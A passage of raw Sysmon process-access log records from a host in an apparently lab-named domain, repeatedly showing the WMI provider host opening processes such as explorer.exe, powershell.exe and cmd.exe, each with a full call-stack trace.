ll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.545{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.529{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 